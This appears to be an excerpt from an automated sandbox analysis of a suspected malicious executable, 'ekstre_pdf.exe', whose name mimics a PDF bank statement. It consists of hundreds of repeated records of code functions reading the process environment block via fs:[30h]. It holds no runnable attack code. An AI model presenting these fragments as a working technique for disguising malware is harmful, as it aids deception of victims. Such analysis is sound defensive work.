Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E05C6 mov eax, dword ptr fs:[00000030h]	1_2_340E05C6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C5C6 mov eax, dword ptr fs:[00000030h]	1_2_3409C5C6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340965D0 mov eax, dword ptr fs:[00000030h]	1_2_340965D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3406B5E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340915EF mov eax, dword ptr fs:[00000030h]	1_2_340915EF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A5E7 mov ebx, dword ptr fs:[00000030h]	1_2_3409A5E7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A5E7 mov eax, dword ptr fs:[00000030h]	1_2_3409A5E7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E55E0 mov eax, dword ptr fs:[00000030h]	1_2_340E55E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EC5FC mov eax, dword ptr fs:[00000030h]	1_2_340EC5FC
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409360F mov eax, dword ptr fs:[00000030h]	1_2_3409360F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F3608 mov eax, dword ptr fs:[00000030h]	1_2_340F3608
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408D600 mov eax, dword ptr fs:[00000030h]	1_2_3408D600
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408D600 mov eax, dword ptr fs:[00000030h]	1_2_3408D600
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134600 mov eax, dword ptr fs:[00000030h]	1_2_34134600
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F607 mov eax, dword ptr fs:[00000030h]	1_2_3411F607
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34065622 mov eax, dword ptr fs:[00000030h]	1_2_34065622
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34065622 mov eax, dword ptr fs:[00000030h]	1_2_34065622
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34067623 mov eax, dword ptr fs:[00000030h]	1_2_34067623
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C620 mov eax, dword ptr fs:[00000030h]	1_2_3409C620
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34060630 mov eax, dword ptr fs:[00000030h]	1_2_34060630
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409F63F mov eax, dword ptr fs:[00000030h]	1_2_3409F63F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409F63F mov eax, dword ptr fs:[00000030h]	1_2_3409F63F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34090630 mov eax, dword ptr fs:[00000030h]	1_2_34090630
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410D62C mov ecx, dword ptr fs:[00000030h]	1_2_3410D62C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410D62C mov ecx, dword ptr fs:[00000030h]	1_2_3410D62C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410D62C mov eax, dword ptr fs:[00000030h]	1_2_3410D62C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E8633 mov esi, dword ptr fs:[00000030h]	1_2_340E8633
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E8633 mov eax, dword ptr fs:[00000030h]	1_2_340E8633
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E8633 mov eax, dword ptr fs:[00000030h]	1_2_340E8633
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34063640 mov eax, dword ptr fs:[00000030h]	1_2_34063640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407F640 mov eax, dword ptr fs:[00000030h]	1_2_3407F640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407F640 mov eax, dword ptr fs:[00000030h]	1_2_3407F640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407F640 mov eax, dword ptr fs:[00000030h]	1_2_3407F640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C640 mov eax, dword ptr fs:[00000030h]	1_2_3409C640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C640 mov eax, dword ptr fs:[00000030h]	1_2_3409C640
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405D64A mov eax, dword ptr fs:[00000030h]	1_2_3405D64A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405D64A mov eax, dword ptr fs:[00000030h]	1_2_3405D64A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409265C mov eax, dword ptr fs:[00000030h]	1_2_3409265C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409265C mov ecx, dword ptr fs:[00000030h]	1_2_3409265C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409265C mov eax, dword ptr fs:[00000030h]	1_2_3409265C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406965A mov eax, dword ptr fs:[00000030h]	1_2_3406965A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406965A mov eax, dword ptr fs:[00000030h]	1_2_3406965A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34095654 mov eax, dword ptr fs:[00000030h]	1_2_34095654
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E166E mov eax, dword ptr fs:[00000030h]	1_2_340E166E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E166E mov eax, dword ptr fs:[00000030h]	1_2_340E166E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E166E mov eax, dword ptr fs:[00000030h]	1_2_340E166E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409666D mov esi, dword ptr fs:[00000030h]	1_2_3409666D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409666D mov eax, dword ptr fs:[00000030h]	1_2_3409666D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409666D mov eax, dword ptr fs:[00000030h]	1_2_3409666D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34073660 mov eax, dword ptr fs:[00000030h]	1_2_34073660
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34073660 mov eax, dword ptr fs:[00000030h]	1_2_34073660
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34073660 mov eax, dword ptr fs:[00000030h]	1_2_34073660
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34057662 mov eax, dword ptr fs:[00000030h]	1_2_34057662
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34057662 mov eax, dword ptr fs:[00000030h]	1_2_34057662
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34057662 mov eax, dword ptr fs:[00000030h]	1_2_34057662
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34060670 mov eax, dword ptr fs:[00000030h]	1_2_34060670
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2670 mov eax, dword ptr fs:[00000030h]	1_2_340A2670
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2670 mov eax, dword ptr fs:[00000030h]	1_2_340A2670
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070680 mov eax, dword ptr fs:[00000030h]	1_2_34070680
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DD69D mov eax, dword ptr fs:[00000030h]	1_2_340DD69D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34068690 mov eax, dword ptr fs:[00000030h]	1_2_34068690
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F68C mov eax, dword ptr fs:[00000030h]	1_2_3411F68C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EC691 mov eax, dword ptr fs:[00000030h]	1_2_340EC691
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341286A8 mov eax, dword ptr fs:[00000030h]	1_2_341286A8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341286A8 mov eax, dword ptr fs:[00000030h]	1_2_341286A8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340606CF mov eax, dword ptr fs:[00000030h]	1_2_340606CF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412A6C0 mov eax, dword ptr fs:[00000030h]	1_2_3412A6C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341086C2 mov eax, dword ptr fs:[00000030h]	1_2_341086C2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408D6D0 mov eax, dword ptr fs:[00000030h]	1_2_3408D6D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340596E0 mov eax, dword ptr fs:[00000030h]	1_2_340596E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340596E0 mov eax, dword ptr fs:[00000030h]	1_2_340596E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406C6E0 mov eax, dword ptr fs:[00000030h]	1_2_3406C6E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340656E0 mov eax, dword ptr fs:[00000030h]	1_2_340656E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340656E0 mov eax, dword ptr fs:[00000030h]	1_2_340656E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340656E0 mov eax, dword ptr fs:[00000030h]	1_2_340656E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340866E0 mov eax, dword ptr fs:[00000030h]	1_2_340866E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340866E0 mov eax, dword ptr fs:[00000030h]	1_2_340866E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DC6F2 mov eax, dword ptr fs:[00000030h]	1_2_340DC6F2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DC6F2 mov eax, dword ptr fs:[00000030h]	1_2_340DC6F2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B705 mov eax, dword ptr fs:[00000030h]	1_2_3405B705
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B705 mov eax, dword ptr fs:[00000030h]	1_2_3405B705
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B705 mov eax, dword ptr fs:[00000030h]	1_2_3405B705
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B705 mov eax, dword ptr fs:[00000030h]	1_2_3405B705
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408270D mov eax, dword ptr fs:[00000030h]	1_2_3408270D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408270D mov eax, dword ptr fs:[00000030h]	1_2_3408270D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408270D mov eax, dword ptr fs:[00000030h]	1_2_3408270D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D700 mov ecx, dword ptr fs:[00000030h]	1_2_3406D700
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F717 mov eax, dword ptr fs:[00000030h]	1_2_3411F717
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412970B mov eax, dword ptr fs:[00000030h]	1_2_3412970B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412970B mov eax, dword ptr fs:[00000030h]	1_2_3412970B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406471B mov eax, dword ptr fs:[00000030h]	1_2_3406471B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406471B mov eax, dword ptr fs:[00000030h]	1_2_3406471B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34089723 mov eax, dword ptr fs:[00000030h]	1_2_34089723
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410E750 mov eax, dword ptr fs:[00000030h]	1_2_3410E750
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409174A mov eax, dword ptr fs:[00000030h]	1_2_3409174A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E174B mov eax, dword ptr fs:[00000030h]	1_2_340E174B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E174B mov ecx, dword ptr fs:[00000030h]	1_2_340E174B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34093740 mov eax, dword ptr fs:[00000030h]	1_2_34093740
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A750 mov eax, dword ptr fs:[00000030h]	1_2_3409A750
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov eax, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov eax, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov eax, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov ecx, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov eax, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34082755 mov eax, dword ptr fs:[00000030h]	1_2_34082755
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F75B mov eax, dword ptr fs:[00000030h]	1_2_3405F75B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34072760 mov ecx, dword ptr fs:[00000030h]	1_2_34072760
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1763 mov eax, dword ptr fs:[00000030h]	1_2_340A1763
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34090774 mov eax, dword ptr fs:[00000030h]	1_2_34090774
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34064779 mov eax, dword ptr fs:[00000030h]	1_2_34064779
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34064779 mov eax, dword ptr fs:[00000030h]	1_2_34064779
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE79D mov eax, dword ptr fs:[00000030h]	1_2_340DE79D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413B781 mov eax, dword ptr fs:[00000030h]	1_2_3413B781
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413B781 mov eax, dword ptr fs:[00000030h]	1_2_3413B781
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34091796 mov eax, dword ptr fs:[00000030h]	1_2_34091796
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34091796 mov eax, dword ptr fs:[00000030h]	1_2_34091796
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340607A7 mov eax, dword ptr fs:[00000030h]	1_2_340607A7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341317BC mov eax, dword ptr fs:[00000030h]	1_2_341317BC
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3412D7A7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3412D7A7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3412D7A7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F7CF mov eax, dword ptr fs:[00000030h]	1_2_3411F7CF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340637E4 mov eax, dword ptr fs:[00000030h]	1_2_340637E4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E7E0 mov eax, dword ptr fs:[00000030h]	1_2_3408E7E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340677F9 mov eax, dword ptr fs:[00000030h]	1_2_340677F9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340677F9 mov eax, dword ptr fs:[00000030h]	1_2_340677F9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34085004 mov eax, dword ptr fs:[00000030h]	1_2_34085004
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34085004 mov ecx, dword ptr fs:[00000030h]	1_2_34085004
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34068009 mov eax, dword ptr fs:[00000030h]	1_2_34068009
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2010 mov ecx, dword ptr fs:[00000030h]	1_2_340A2010
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405D02D mov eax, dword ptr fs:[00000030h]	1_2_3405D02D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413505B mov eax, dword ptr fs:[00000030h]	1_2_3413505B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34090044 mov eax, dword ptr fs:[00000030h]	1_2_34090044
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E6040 mov eax, dword ptr fs:[00000030h]	1_2_340E6040
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34061051 mov eax, dword ptr fs:[00000030h]	1_2_34061051
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34061051 mov eax, dword ptr fs:[00000030h]	1_2_34061051
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34109060 mov eax, dword ptr fs:[00000030h]	1_2_34109060
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34066074 mov eax, dword ptr fs:[00000030h]	1_2_34066074
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34066074 mov eax, dword ptr fs:[00000030h]	1_2_34066074
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34067072 mov eax, dword ptr fs:[00000030h]	1_2_34067072
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34134080 mov eax, dword ptr fs:[00000030h]	1_2_34134080
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405C090 mov eax, dword ptr fs:[00000030h]	1_2_3405C090
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405A093 mov ecx, dword ptr fs:[00000030h]	1_2_3405A093
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341350B7 mov eax, dword ptr fs:[00000030h]	1_2_341350B7
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
